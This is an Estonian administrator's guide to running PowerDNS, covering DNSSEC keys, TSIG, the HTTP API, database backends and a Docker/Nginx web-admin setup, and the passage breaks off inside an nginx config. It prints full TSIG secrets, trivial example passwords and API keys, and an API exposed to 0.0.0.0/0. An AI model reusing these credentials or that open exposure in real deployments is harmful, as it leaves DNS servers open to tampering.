seejuures

avanenud dialoogi pasteda tsoonifaili sisu
eemaldada SOA kirje
asendada NS kirjetesse õiged väärtused
kõik nimed (kirje kõige vasem positsioon) peavad olema pikad ja lõppema punktiga
eemaldada linnuke 'Overwrite Nameservers' juurest

* Mitme elemendilise väärtuse puhul tuleb see nii sisestada, nt MX kirje puhul

10 mx.moraal.ee.

* Eeldusel, et on olemas Content tulbas kasutatav A kirje ip aadressile vastav in-addr.arpa tsoon, saab nsedit abil tekitada automaatselt PTR kirje.

====Kasulikud lisamaterjalid====

* https://github.com/tuxis-ie/nsedit

===DNSSEC tsooni esmane juurutamine===

Tundub, et uuemal ajal saab DNSSEC juures kasatada CSK (Combined Signing Key) võtit ja seda kasutab PowerDNS vaikimisi, kuid samas CSK võtmeid registripidajad eriti ei toeta. Ja PowerDNS toetab ka nö klassikalist KSK+ZSK komplekti kasutamist.

====KSK ja ZSK võtmete kasutamine====

Võtmete tsooniga seostamiseks sobib öelda

# pdnsutil add-zone-key moraal.ee ksk 2048 active rsasha256
# pdnsutil add-zone-key moraal.ee zsk 1024 active rsasha256
# pdnsutil set-nsec3 moraal.ee '1 0 5 0...f'
# pdnsutil set-meta moraal.ee SOA-EDIT-API INCEPTION-INCREMENT
# pdnsutil set-meta moraal.ee SOA-EDIT INCEPTION-INCREMENT
# pdnsutil increase-serial moraal.ee
# pdnsutil rectify-zone moraal.ee
# pdnsutil show-zone moraal.ee

mis

* tekitab võtmed
* kui set-meta kogemata vääratab, nt lisati SOA-EDIT-SOA, siis saab meta data eemaldada, st näitamata väärtust

# pdnsutil set-meta moraal.ee SOA-EDIT-SOA

* võtab kasutusele nsec3 hash'ide arvutamiseks vajaliku materjali (0-f on 16-elemendiline juhuslik hex järgnevus, mis saadake nt nii

$ head -c 512 /dev/urandom | sha1sum | cut -b 1-16
7bc59a6dd87fa477

ja ideaalis võiks seda regulaarselt muuta), nt

$ dig +short moraal.ee nsec3param
1 0 5 E7544BB6070C3E0F

(kus 1 - sha1, 0 - opt-out, 5 - iterations, E7544BB6070C3E0F - salt)

* INCEPTION-INCREMENT rida seadistab selliselt, et kui automaaselt tsooni andmed resigneeritakse, siis suurendatakse ka seriali (muidu ei toimu notify ja andmed ei jõua avalikesse pädevatesse nimeserveritesse)
* rectify tuleb põhimõtteliselt öelda peale iga tsooni muudatust, et olla täiesti kindel tsooni toimimises; kui PowerDNS kasutatakse avalike nimeserverite varjatud masterina, pole see probleem

ning tsooni andmed paistavad

# pdnsutil show-zone moraal.ee
Nov 06 23:49:44 [bindbackend] Done parsing domains, 0 rejected, 0 new, 0 removed
This is a Master zone
Last SOA serial number we notified: 2016103003 == 2016103003 (serial in the database)
Metadata items:
SOA-EDIT INCEPTION-INCREMENT
SOA-EDIT-API INCEPTION-INCREMENT
Zone has NSEC3 semantics, configuration: 1 0 1 ab
keys:
ID = 11 (ZSK), flags = 256, tag = 26589, algo = 8, bits = 1024 Active ( RSASHA256 )
ID = 10 (KSK), flags = 257, tag = 53461, algo = 8, bits = 2048 Active ( RSASHA256 )
KSK DNSKEY = moraal.ee. IN DNSKEY 257 3 8 AwEAAcn... TQcnQstT+tU= ; ( RSASHA256 )
DS = moraal.ee. IN DS 53461 8 1 6c123b39076072da... c66f62b1e3c388b86b7f ; ( SHA1 digest )
DS = moraal.ee. IN DS 53461 8 2 b85dee98efa6e3bb... 57ce193f728f6b2b1d0dd262 ; ( SHA256 digest )
DS = moraal.ee. IN DS 53461 8 3 1359b0b2b97e60b2... 844b207e84bf5c109eb2e151 ; ( GOST R 34.11-94 digest )
DS = moraal.ee. IN DS 53461 8 4 6d735926cd5cf68b... 9ca2af1f72b3b8f67900bb32a94c ; ( SHA-384 digest )

kus

* kaks võtit, ID väärtustega 10 ja 11

Seejärel tuleb registripidajale öelda DS väärtus.

Tulemuse saab kontrollida nt aadressil http://dnsviz.net/d/moraal.ee/dnssec/.

DNSSEC eemaldamiseks tuleb

* esmalt eemaldada registripidaja juurest DS kirje (reeglina see õnnestub, aga nt 2017 aasta kevadel .org domeenide puhul on tulemuseks dnssec viga, tavaline servfail)
* tsoonis dnssec väljalülitamiseks sobib öelda

# pdnsutil disable-dnssec moraal.ee

====Tulemuse kontrollimine====

Kui kõik juba töötab (ja on vist on vajalik, et kasutada on mõni dnssec-võimeline rekursiivne nimeserver), saab tulemust kontrollida nt nii

$ ldns-rrsig moraal.ee a
moraal.ee RRSIG(a): Thu Oct 27 00:00:00 2016 - Thu Nov 17 00:00:00 2016

====Märkused====

* DNSSEC RRSIG signatuure arvutatakse iga 2 nädala tagant üle selleks, et piirata replay attack võimalusi. Põhimõtteliselt saab pahalane päringule vastuseks saata mõne varasemalt võrgus olnud vastuse (st RRSet + RRSIG komplekti) eeldusel, et ta kontrollib kasutaja võrguliiklust. Tänu RRSIG piiratud kehtivusajale (nt 2 nädalat) saab ta seda teha mitte vanemate kui 2 nädalat andmetega, lisaks ta on piiratud saatma mitte suvalisi vastuseid, vaid viimase kahe nädala jooksul kasutuses olnud vastuseid.

====Kasulikud lisamaterjalid====

* https://blog.powerdns.com/2016/02/02/powerdns-authoritative-the-new-old-way-to-manage-domains/

====CSK võtme kasutamine====

Märkus 2016 lõpus: tundub, et see CSK on mingi tulevikutehnoloogia.

Olemasoleva tsooni jaoks DNSSEC sisselülitamiseks sobib öelda

# pdnsutil secure-zone moraal.ee
# pdnsutil set-nsec3 moraal.ee '1 0 1 ab'
# pdnsutil rectify-zone moraal.ee
# pdnsutil set-meta moraal.ee SOA-EDIT-API INCEPTION-INCREMENT
# pdnsutil increase-serial moraal.ee
# pdnsutil show-zone moraal.ee

Seejärel tuleb registripidajale öelda DS väärtus.

Tulemuse saab kontrollida nt aadressil http://dnsviz.net/d/moraal.ee/dnssec/.

DNSSEC eemaldamiseks tuleb

* esmalt eemaldada registripidaja juurest DS kirje
* tsoonis dnssec väljalülitamiseks sobib öelda

# pdnsutil disable-dnssec moraal.ee

Misc

* tagasi nsec peale viimiseks

# pdnsutil unset-nsec3 moraal.ee

===DNSSEC tsooni seostamine DS sissekande abil ülevalpool oleva tsooniga===

DNSSEC tsooni seostamiseks ülevalpool oleva tsooniga on vaja teada selliseid andmeid

* võtme silt
* võtme tüüp
* algoritm
* avalik võti (või DS mis on avaliku võtme räsi vms)

Need kõik on avalik info ja kättesaadavad domeeni pädevast nimeserverist, aga PowerDNS haldusutiliidiga saab selle küsida otsekoheselt

# pdnsutil show-zone moraal.ee

Ühesõnaga, kui ise kasutatakse PowerDNS'i või partner saadab need andmed, siis allpool toodud dig käsuga tegelemist pole tarvis läbi teha. Tulemust sobib kontrollida nt aadressil http://dnsviz.net/.

====zone.ee keskkonnas - .ee tsoonis====

Logida sisse oma kasutajaga ja valida vasakult paneelist 'Teenuste ülevaade', kõnelaluse tsooni juures pressida rohelist + märki DNSSEC tulbas. Avanenud uuel eraanil vajutada üleval sinist nuppu Aktiveeri (muutub roheliseks), vajutada võtmete nimekirjas + märki ja täita lahtrid

[[Pilt:Pdns-3.gif]]

kus

* võtme silt - (antud juhul 53461), selle saab teada päringu väjundist

$ dig @ns.auul.pri.ee moraal.ee dnskey rrsig | grep DNSKEY
moraal.ee. 10800 IN RRSIG DNSKEY 8 2 10800 20161208000000 20161117000000 53461 moraal.ee. rVy+HAzSKkTRv6...

* võtme tüüp - KSK
* algoritm - 8 (RSA-SHA256)
* avalik võti, selle saab teada päringu väljundist, alates Aw kuni tU= (võib sisaldada tühikuid nagu päringu vastuses on)

$ dig @ns.auul.pri.ee moraal.ee dnskey | grep 257
moraal.ee. 3600 IN DNSKEY 257 3 8 AwEAAcnmmnnOlkRfK9NDYEI6F ... SD6 TQcnQstT+tU=

Vajutada all nuppu Kinnita, muudatus kehtestub peaaegu koheselt (ehk minutite jooksul), aga kasutajaliideses öeldakse

DNSSEC kaitse domeenil MORAAL.EE
Hetkestaatus: DNSSEC on aktiveerimata
Eesootavad muutused: DNSSEC aktiveeritakse

Teha brauseris refresh ja peab olema domeenide nimekirjas DNSSEC tulbas + asemel kilbi kujutis. Edasi läheb nn 15 minutit kuni muudatus zone.ee juurest eestiinternet.ee juurde jõuab ning kehtestub ee. tld (top level domain) nimeserverites. Kontrolliks maksab küsida tld nimeserverilt ds kirjet

$ dig +short @ns.tld.ee moraal.ee ds
30607 8 2 EAC8A17DD2128573F08EE76C18B4AB01734467CD4A376768F5358B0C A2B9463F

====zone.ee keskkonnas - .org tsoonis====

[[Pilt:Pdns-6.gif]]

====GoDaddy keskkonnas====

TODO

===DNSSEC võtmete asendamine===

====ZSK====

====KSK====

KSK moodi võtme lisamiseks sobib öelda, selliselt võib tsooniga siduda ka enam kui kaks võtit

# pdnsutil add-zone-key moraal.ee ksk 2048 active rsasha256

Tsooniga seotud võtmed paistavad käsu väljundis

# pdnsutil show-zone moraal.ee

Tulemusena paistab dnsviz keskkonnas selline pilt

TODO

Tsooniga seotud võtme eemaldamiseks sobib öelda, kus ID on show-zone väljundist välja valitud võtme ID väärtus

# pdnsutil remove-zone-key moraal.ee ID

====Kasulikud lisamaterjalid====

* https://doc.powerdns.com/md/authoritative/howtos/#zsk-rollover

===Mitmesugused haldusprotseduurid===

====tsooni backend muutmine====

TODO

====tsooni toomine PowerDNS kontrolli alla====

Tsooni migreerimiseks suvalisest AXFR-võimelisest nimeserverist sobib

* kirjeldada PowerDNS peal slave

# pdnsutil create-slave-zone moraal.ee 10.0.6.15
Feb 21 22:09:52 [bindbackend] Done parsing domains, 0 rejected, 0 new, 0 removed
Creating slave zone 'moraal.ee', with master(s) '10.0.6.15:53'

* kopeerida andmed axfr abil üle, kopeerimist kiirendab

# pdns_control retrieve moraal.ee

* muuta PowerDNS tsooni jaoks masteriks, öeldes

SQL> UPDATE domains set type='MASTER' where type='SLAVE';

Kui allikaks on nt BIND ning tsoonifailis on kasutatud generate konstruktsiooni, siis need lahenduvad automaatselt ära

$GENERATE 1-255 $ IN CNAME $.1-255.40.184.10.in-addr.arpa.

Kasulikud lisamaterjalid

* https://doc.powerdns.com/md/authoritative/migration/

====dnssec tsooni toomine PowerDNS kontrolli alla====

Analoogiliselt eelmisele punktile, aga

* esmalt lülitada dnssec välja, kustutades DS kirje parent tsoonist ja oodates vähemalt DS kirje TTL aja enne järgmise punkti juurde asumist; seejärel on tsooni sisu endine st vanade võtmetega signeeritud andmestik
* tegevused eelmises punktis + uute võtmetega krüptimine
* asuda kasutama uute võtmetega krüptitud tsooni sisu, ja oodata nt 6 tundi
* juurutada parent tsoonis uus DS kirje

====dnssec tsooni toomine PowerDNS kontrolli alla OpenDNSSEC keskkonnast koos vana KSK krüptomaterjaliga====

Eeldusel, et OpenDNSSEC kasutab SoftHSM backendi saab KSK krüptomaterjalid eksportida ja taaskasutada. Ettevalmistuseks tuleb kõnealune tsoon muus osas tavalisel viisil kasutusele võtta. SoftHSM pealt krüptomaterjali eksportimiseks tuleb esmalt teha kindlaks kolm väärust

* SoftHSM label ja pin vaadata nt /etc/opendnssec/conf.xml failist
* kõnealuse tsooni ksk võtme id, vaadata KSK active realt tulp 'CKA_ID'

# ods-ksmutil key list -v

sobib öelda

# softhsm --export moraal.ee-ksk.pem --slot 0 --label "vaartus" --pin vaartus --id vaartus
The key pair has been written to moraal.ee-ksk.pem

teisendada nn BIND kujule

# softhsm-keyconv --tobind --in ksk.pem --name moraal.ee --ksk --algorithm RSASHA256
The private key has been written to Kmoraal.ee+008+09122.private
The public key has been written to Kmoraal.ee+008+09122.key

ning võtta kasutusele PowerDNS juures

# pdnsutil import-zone-key moraal.ee Kksk+008+53675.private active ksk

Edasi seadistatakse DNSSEC analoogliselt nagu seada ikka PowerDNS puhul seadistatakse. Kusjuures 'pdnsutil import-zone-key ...' tulemus on sarnane nagu oleks öeldud

# pdnsutil add-zone-key moraal.ee ksk 2048 active rsasha256

Kasulikud lisamaterjalid

* http://www.molnar-peter.hu/en/

====pdns-control utiliidi kasutamine====

PowerDNS kus on master tsoon saadab notify oma slavedele (nagu on tsoonifaili NS kirjetes kirjas)

# pdns_control notify <domain>

või näidatud ip aadressile

# pdns_control notify-host <domain> <ip-address>

===TSIG kasutamine===

Nimeserverite vahelise tsooniedastuse juures TSIG juurutamiseks tuleb esmalt tekitada võti

# pdnsutil generate-tsig-key from_dns_to_itm hmac-sha256
Generating new key with 64 bytes (this can take a while)
Nov 26 13:10:37 [bindbackend] Done parsing domains, 0 rejected, 0 new, 0 removed
Create new TSIG key from_dns_to_itm hmac-sha256 WLuS4o6CX35+yGerdHpl2h3+PDKt76rgam9rqkRg8N+fTP6cGtC6H17rDidKl7FzEu0fukg3apxnZUxdDRDhkQ==

kus

* TODO

ning seejärel võti ühe või enama tsooniedastusega seostada

# pdnsutil activate-tsig-key moraal.ee from_dns_to_itm master

Tulemus paistab nii

<pre>
# pdnsutil show-zone moraal.ee
Nov 26 14:09:44 [bindbackend] Done parsing domains, 0 rejected, 0 new, 0 removed
This is a Master zone
Last SOA serial number we notified: 2016112602 == 2016112602 (serial in the database)
Zone is not actively secured
Zone has following allowed TSIG key(s): from_dns_to_itm
Metadata items:
SOA-EDIT-API DEFAULT
TSIG-ALLOW-AXFR from_dns_to_itm
No keys for zone 'moraal.ee'.
</pre>

kontrolliks sobib kopeerida öeldes

$ dig @192.168.1.248 moraal.ee axfr -y "hmac-sha256:from_dns_to_itm:WLuS4o6CX35+yGerdHpl2h3+PDKt76rgam9rqkRg8N+fTP6cGtC6H17rDidKl7FzEu0fukg3apxnZUxdDRDhkQ=="

kusjuures vastuses on üks preudokirje lisaks

..
from_dns_to_itm. 0 ANY TSIG hmac-sha256. 1480164029 300 32 t96WhnpNiAiL5KHXa8UzNthM6/p3ciQptF3Br2ZfhFk= 3538 NOERROR 0
...

Väited

* Sama TSIG võtit saab kasutada mitme tsooni jaoks ja nii on mugavam nt NSD patternit kasutada
* tundub, et tsooni jaoks TSIG juurutamisega kaasneb, et tsooni kopeerimise ip piirang enam ei kehti (lubatud ip pealt pöördudes ei ole võtme esitamine vajalik)
* kui tsooni juures on tsig sisse lülitatud, siis see mõjub nii notify kui xfr jaoks
* TSIG pseudokirjete arv suureneb vastavalt tsooni mahu suurenemisele, https://tools.ietf.org/html/rfc2845 'The TSIG MUST be included on the first and last DNS envelopes. It can be optionally placed on any intermediary envelopes. It is expensive to include it on every envelopes, but it MUST be placed on at least every 100'th envelope.'

Alternatiiv on kasutada -y asemel -k suvandit ja argumendiks failinime, faili sisuga

<pre>
key "from_yks_to_teine" {
algorithm HMAC-SHA256;
secret "YY8xvlL6yGjrt1G4xlfLBaidQOFdvixHgRXN6tXUPMitEKZUs7kl7qixJ0nSN1bbDJQxaFGkoKkBamNS7EPXbw==";
};
</pre>

===API kasutamine===

Üle API muudatuse tegemiseks peab eelnevalt PowerDNS serveris lülitama API sisse ning sisemise webserver käivitama

# cat /etc/powerdns/pdns.conf
..
api=yes
api-key=apiparool
webserver=yes
webserver-address=192.168.1.248
webserver-allow-from=0.0.0.0/0,::/0,192.168.10.0/24
...

ja kasutama nt sellist skripti (töökohaarvutis on seejuures abil kasutada nt jq utiliiti)

<pre>
# cat pdns-api.sh
curl -X PATCH --data \
'{"rrsets":
[{ "name": "www.moraal.ee.",
"records": [{ "content": "192.168.254.5", "disabled": false }],
"ttl": 86000,
"type": "A",
"changetype": "REPLACE"
}]
}' -H 'X-API-Key: midagisalajast123' http://192.168.1.248:8081/api/v1/servers/localhost/zones/moraal.ee. | jq .
</pre>

kus

* TODO

kas käivitamiseks öelda

$ sh pdns-api.sh

API'ga tutvumiseks võib olla hea mõte kuulata pealt mingi olemasoleva API-rakenduse ja serveri vahelist liiklust ja siis seda Wireshark abil uurida.

Kasulikud lisamaterjalid

* https://doc.powerdns.com/md/httpapi/README/ - tundub, et süntaks pole seal kõigis näidetes päris korrektne

===PowerDNS kasutusstatistika===

PowerDNS sisaldab sisemist veebiserverit, mille käest saab küsida teenuse kasutusstatistikat, TODO.

===Logimine===

Tundub, et vaikimisi logitakse syslog'i.

===Varundamine ja taaste===

TODO

===Misc===

====Paigaldamine operatsioonisüsteemi paketihaldusest====

Paigaldamiseks sobib öelda, tuleb paigalda üldosa + mingi backend, nt BIND-ühilduvate tsoonifailide käsitlemise komponent (st failisüsteem)

# apt-get install pdns-server pdns-backend-bind

Tulemusena tekib failisüsteemi

* /etc/powerdns/pdns.conf - peamine seadistusfail

====MySQL backend kasutamine====

Teoreetliselt võib sodida tsooni sisu muutmiseks üldotstarbelise sql editoriga (nt PgAdmin) ka otse baasis, aga praktilisem on kasutada ehk pdnsutil või api't kasutava tarkvara abil, nt nsedit veebiliides.

====pdns-backend-mysql paigaldamine ja seadistamine====

Eeldusel, et MySQL baas juba töötab samas arvutis, sobib paigaldamiseks sobib öelda (seejuures kasutades db-config sistemat, mis paigaldamise käigus tekitab create database baasi, kasutaja, sätib privileegid jne)

# apt-get install pdns-backend-mysql
..
Determining localhost credentials from /etc/mysql/debian.cnf: succeeded.
dbconfig-common: writing config to /etc/dbconfig-common/pdns-backend-mysql.conf

Creating config file /etc/dbconfig-common/pdns-backend-mysql.conf with new version

Creating config file /etc/powerdns/pdns.d/pdns.local.gmysql.conf with new version
checking privileges on database pdns for pdns@localhost: user creation needed.
granting access to database pdns for pdns@localhost: success.
verifying access for pdns@localhost: success.
creating database pdns: success.
verifying database pdns exists: success.
populating database via sql... done.
dbconfig-common: flushing administrative password
Processing triggers for libc-bin (2.24-3) ...
Processing triggers for pdns-server (4.0.1-5) ...

Tulemusena

* tekitatakse MySQL kasutaja pdns
* tekitatakse MySQL create database pdns

====BIND backend kasutamine====

Tundub, et otsekoheselt failisüsteemis tsoonifaili redigeerimise teel on mõeldav töötada ainult BIND-formaadis backendiga. Muudega tuleks kasutada pdnsutil utiliiti või API liidest. Tsoonide nimekiri kirjeldatakse failis

# cat /etc/powerdns/named.conf
# Debian default: supermaster created zones are written here:
include "/var/lib/powerdns/supermaster.conf";
# Example for a manually configured slave zone:
#
zone "example.net" {
file "/var/lib/powerdns/zones.slave.d/example.net.zone";
type master;
masters { 192.0.2.53; };
};

Tsoon kirjeldatakse failis

# cat /var/lib/powerdns/zones.slave.d/example.net.zone
$TTL 180
@ IN SOA ns1.example.net. hostmaster.example.net. (
2014080705 ; Serial Number (date YYYYMMDD++)
86400 ; Refresh (24 hours)
1800 ; Retry (1/2 hour)
3600000 ; Expire (42 days)
21600) ; Minimum (6 hours)
IN NS ns1.example.net.
IN NS ns2.example.net.

@ IN A 192.168.0.15
IN MX 10 mail.example.net.
www IN A 192.168.0.15
mail IN A 192.168.0.2
ns1 IN A 10.1.1.171
ns2 IN A 10.1.1.172
imre IN A 10.1.1.173

Muudatuse kehtestamiseks

# pdns_control bind-reload-now example.net
example.net: parsed into memory at 2016-10-26 20:43:14 +0300

====PostgreSQL backend kasutamine====

Teoreetliselt võib sodida tsooni sisu muutmiseks üldotstarbelise sql editoriga (nt PgAdmin) ka otse baasis, aga praktilisem on kasutada ehk pdnsutil või api't kasutava tarkvara abil, nt nsedit veebiliides.

====BIND backend kasutamine====

pdns-backend-bind seadistatakse failist

# egrep -v "^$|^#" /etc/powerdns/pdns.d/bind.conf
launch+=bind
bind-config=/etc/powerdns/named.conf
bind-supermaster-config=/var/lib/powerdns/supermaster.conf
bind-supermaster-destdir=/var/lib/powerdns/zones.slave.d

kus

* /etc/powerdns/named.conf - tsoonide nimekiri
* /var/lib/powerdns/supermaster.conf - lihtsal juhul tühi
* /var/lib/powerdns/zones.slave.d - BIND formaadis tsoonifailide kataloog

Tsoonide haldamisega tegeleb edasi allpool olev punkt.

====Poweradmin====

Märkus: tõenäoliselt ei ole Poweradmin tarvkara kasutamine hea mõte kuna rakendus sodib otse PowerDNS andmebaasis ja 2016 aasta sügisel on hakanud tekkima paremaid alternatiive, nt nsedit.

Poweradmin kasutamiseks peab PowerDNS kasutama SQL andmebaasi ja Poweradmin peab töötama vastu sama andmebaasi. Tundub, et Poweradmin töötab paremini MySQL + PHP5 keskkonnas. Kui Poweradmin PHP rakendus töötab teises arvutis kui MySQL baas, sobib baasis öelda

mysql> grant all privileges on pdns.* to 'pdns'@'%' identified by 'dbconfig sisestatud parool';
mysql> grant all privileges on pdns.* to 'pdns'@'localhost' identified by 'dbconfig sisestatud parool';
mysql> flush privileges;

# pdns_control retrieve moraal.ee
Added retrieval request for 'moraal.ee.' from master 192.168.1.247

Kasulikud lisamaterjalid

* https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-powerdns-with-a-mariadb-backend-on-ubuntu-14-04

====Tsooni andmestikust otsing====

* Kõigi forward tsoonide sisust ip aadressi kasutamise leidmine

# for i in `pdns_control list-zones | grep -v All | grep -v in-addr`; do pdnsutil list-zone $i 2>&1 ; done | grep 10.20.123.154
ftp.moraal.ee 300 IN A 10.20.123.154

===2024 aasta kevade tähelepanekud===

Eesmärk

* ühe operatsioonisüteemi peal kompaktselt lahenduse pidamine - Debian v. 12
* dns server - PowerDNS
* webgui haldusliides - PowerDNS-Admin (PDA)
* dnssec võimekus
* docker abil kasutatakse konteinerit (PDA)
* andmeid hoitakse PostgreSQL andmebaasis

====Tööpõhimõte====

Väited

* dnssec kasutab algoritmi nr 13
* NSEC3 kasutab '1 0 0 -' seadistust
* sekundaarsete nimeserveritega suhtlemine toimub catalog-zones abil
* kasutatakse KSK/ZSK ja CSK lähenemist võtmete pidamisel

Protseduuride võimekus

* NSEC, NSEC3 ja NSEC3 param väärtuste muutmine
* võtme vahetus
* krüptimise algoritmi vahetus

====Platvormi ettevalmistamine====

Platvorm koosneb

* Debian v. 12 operatsioonisüsteem
* Docker Community Edition
* PostgreSQL v. 12
* NginX

PostgreSQL

<pre>
root@pdns:/tmp# apt-get install postgresql-common
root@pdns:/tmp# mkdir /etc/postgresql-common/createcluster.d
root@pdns:/tmp# echo "initdb_options = '--data-checksums'" > /etc/postgresql-common/createcluster.d/moraal.conf
root@pdns:/tmp# echo "create_main_cluster = false" >> /etc/postgresql-common/createcluster.d/moraal.conf
root@pdns:/tmp# apt-get install postgresql-16
root@pdns:/tmp# pg_createcluster --locale en_US.UTF-8 16 pgcluster_pdns_prod

postgres=# \x
Expanded display is on.
postgres=# \l postgres
List of databases
-[ RECORD 1 ]-----+------------
Name | postgres
Owner | postgres
Encoding | UTF8
Locale Provider | libc
Collate | en_US.UTF-8
Ctype | en_US.UTF-8
ICU Locale |
ICU Rules |
Access privileges |
</pre>

PowerDNS kasutaja ja create database baasi tekitamiseks sobib öelda

<pre>
# su - postgres
$ psql
sql> create role pdns login;
sql> \password pdns
sql> create database db_pdns owner = pdns;
</pre>

PowerDNS-Admin kasutaja ja create database baasi tekitamiseks sobib öelda

<pre>
# su - postgres
$ psql
sql> create role pda login;
sql> \password pda
sql> create database db_pda owner = pda;
</pre>

====PowerDNS paigaldamine====

PowerDNS ise ja tema tööks otseselt vajalikud komponendid (nt PostgreSQL andmebaas) töötavad nö tavalisel viisil operatsioonisüsteemi protsesside-teenustena st mitte-konteineritena.

<pre>
# apt-get install pdns-server pdns-backend-pgsql pdns-tools
</pre>

Tulemusena käivitatakse pdns server ja tema bind backend.

TODO

PostgreSQL backend kasutamine

<pre>
# psql -h 127.0.0.1 -U pdns pdns < /usr/share/doc/pdns-backend-pgsql/schema.pgsql.sql
Password for user pdns:
CREATE TABLE
CREATE INDEX
CREATE INDEX
CREATE TABLE
CREATE INDEX
...
</pre>

Baasi ligipääs jms kirjeldatakse failis, https://doc.powerdns.com/authoritative/backends/generic-postgresql.html#

<pre>
root@pdns:~# egrep -v "^#|^$" /etc/powerdns/pdns.d/gpgsql.conf
launch+=gpgsql
gpgsql-dbname=db_pdns
gpgsql-dnssec=yes
gpgsql-host=127.0.0.1
gpgsql-password=parool
gpgsql-port=5432
gpgsql-user=pdns
</pre>

bind eemaldamiseks sobib kustutada fail

# rm /etc/powerdns/pdns.d/bind.conf

Tulemusena töötab pdns server, gpgsql backendiga

<pre>
2024-06-16T16:44:00.877817+03:00 pdns systemd[1]: Starting pdns.service - PowerDNS Authoritative Server...
2024-06-16T16:44:00.906026+03:00 pdns pdns_server[3916]: Loading '/usr/lib/x86_64-linux-gnu/pdns/libgpgsqlbackend.so'
2024-06-16T16:44:00.906356+03:00 pdns pdns_server[3916]: This is a standalone pdns
2024-06-16T16:44:00.906408+03:00 pdns pdns_server[3916]: Listening on controlsocket in '/run/pdns/pdns.controlsocket'
2024-06-16T16:44:00.906668+03:00 pdns pdns_server[3916]: UDP server bound to 0.0.0.0:53
2024-06-16T16:44:00.906684+03:00 pdns pdns_server[3916]: UDP server bound to [::]:53
2024-06-16T16:44:00.906735+03:00 pdns pdns_server[3916]: TCP server bound to 0.0.0.0:53
2024-06-16T16:44:00.906750+03:00 pdns pdns_server[3916]: TCP server bound to [::]:53
2024-06-16T16:44:00.906866+03:00 pdns pdns_server[3916]: PowerDNS Authoritative Server 4.9.1 (C) PowerDNS.COM BV
2024-06-16T16:44:00.906881+03:00 pdns pdns_server[3916]: Using 64-bits mode. Built using gcc 12.2.0 on May 28 2024 07:46:05 by root@localhost.
2024-06-16T16:44:00.906891+03:00 pdns pdns_server[3916]: PowerDNS comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it according to the terms of the GPL version 2.
2024-06-16T16:44:00.915255+03:00 pdns pdns_server[3916]: Polled security status of version 4.9.1 at startup, no known issues reported: OK
2024-06-16T16:44:00.926644+03:00 pdns pdns_server[3916]: Creating backend connection for TCP
2024-06-16T16:44:00.935773+03:00 pdns pdns_server[3916]: About to create 3 backend threads for UDP
2024-06-16T16:44:00.935850+03:00 pdns systemd[1]: Started pdns.service - PowerDNS Authoritative Server.
2024-06-16T16:44:01.086206+03:00 pdns pdns_server[3916]: Done launching threads, ready to distribute questions
</pre>

ühtegi tsooni ei ole kirjeldatud

<pre>
root@pdns:/tmp# pdnsutil list-all-zones
root@pdns:/tmp#
</pre>

====PowerDNS seadistamine====

Seadistamisel tegeldakse

* api sisselülitamine (PDA jaoks)
* SOA kirje vaikeväärtused
* DNSSEC vaike krüpto

====PowerDNS-Admin paigaldamine - PDA - docker====

PowerDNS-Admin tarvkara töötab docker konteinerina, aga kasutab host arvutist postgresql andmebaasi. Platvorm ettevalmistamine punktis on vajalik kasutaja ja create database tekitatud. PDA kasutamine eeldab, et PDNS juures on sisse lülitatud api liides (vaikimisi http liiklus üle port 8081).

Docker compose fail

<pre>
root@pdns:~# cat docker-compose-pda.yml
services:
svc_pda:
image: powerdnsadmin/pda-legacy:v0.4.2

container_name: cn_pda
restart: always
logging:
driver: json-file
options:
max-size: 50m
ports:
- "9191:80"
environment:
- SECRET_KEY='saladus'
- SQLALCHEMY_DATABASE_URI=postgresql://pda:pdaparool@192.168.10.53/pda
- GUNICORN_TIMEOUT=60
- GUNICORN_WORKERS=2
- GUNICORN_LOGLEVEL=DEBUG
- OFFLINE_MODE=False
- CSRF_COOKIE_SECURE=False

networks:
- nw_pda

networks:
nw_pda:
name: nw_pda
driver: bridge
</pre>

Käivitamiseks

# docker compose -f docker-compose-pda.yml up -d

Tulemusena on aadressil http://192.168.10.53:9191/ PDA webgui sisselogimise ekraan. Pressida Create Account ja esimesena tekitatud kasutaja on admin privileegidega.

TODO

====PowerDNS-Admin paigaldamine - NginX operatsioonisüsteem====

NginX https:// frontend kasutamiseks sobib kasutada sellist seadistust

<pre>
root@pdns:/etc/nginx/sites-enabled# cat /etc/nginx/sites-enabled/pdns
server {
listen 80;
server_name pdns.moraal.ee;
root /var/www/html;

if ($request_uri !~ /.well-known) {
return 301 https://pdns.moraal.ee/;
}
}

server {
listen 443 ssl http2;
server_name pdns.moraal.ee;
ssl_certificate /etc/ssl/localcerts/pdns.moraal.ee.pem;
ssl_certificate_key /etc/ssl/localcerts/pdns.moraal.ee.key;
ssl_session_timeout 1d;
ssl_session_cache shared:MozSSL:10m;
ssl_session_tickets off;
ssl_protocols TLSv1.2 TLSv1.3;
ssl_prefer_server_ciphers off;
ssl_ciphers ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:DHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384:DHE-RSA-CHACHA20-POLY1305;

client_max_body_size 25m;

ssl_stapling off;
add_header Strict-Transport-Security "max-age=63072000" always;

access_log /var/log/nginx/access-pdns.moraal.ee-443.log;
root /var/www/html;

location / {
proxy_set_header Host $http_host;
proxy_set_header X-Forwarded-For $remote_addr;
proxy_set_header X-Forwarded-Proto https;
proxy_pass http://192.168.10.53:9191;
}
}
</pre>

====PowerDNS-Admin paigaldamine - NginX docker====

<pre>
# cat /srv/pdns/volume/nginx/etc/nginx/nginx.conf
# nginx.conf

user nginx;
worker_processes auto;
error_log /dev/stderr;
pid /var/run/nginx.pid;

events {
worker_connections 1024;
}

http {
include mime.types;
default_type application/octet-stream;

log_format main '$remote_addr - $remote_user [$time_local] "$request" '
'$status $body_bytes_sent "$http_referer" '
'"$http_user_agent" "$http_x_forwarded_for"';
access_log /dev/stdout main;

sendfile on;
keepalive_timeout 65;

# Redirect HTTP to HTTPS
server {
listen 80;
server_name _;
return 301 https://$host$request_uri;
}

# HTTPS Configuration
server {
listen 443 ssl;
server_name _;
http2 on;
ssl_protocols TLSv1.3;
ssl_prefer_server_ciphers on;

ssl_certificate /etc/ssl/localcerts/ns-pdns-01.auul.pri.ee.crt;
ssl_certificate_key /etc/ssl/localcerts/ns-pdns-01.auul.pri.ee.key;

# Recommended security settings
ssl_session_cache shared:SSL:10m;
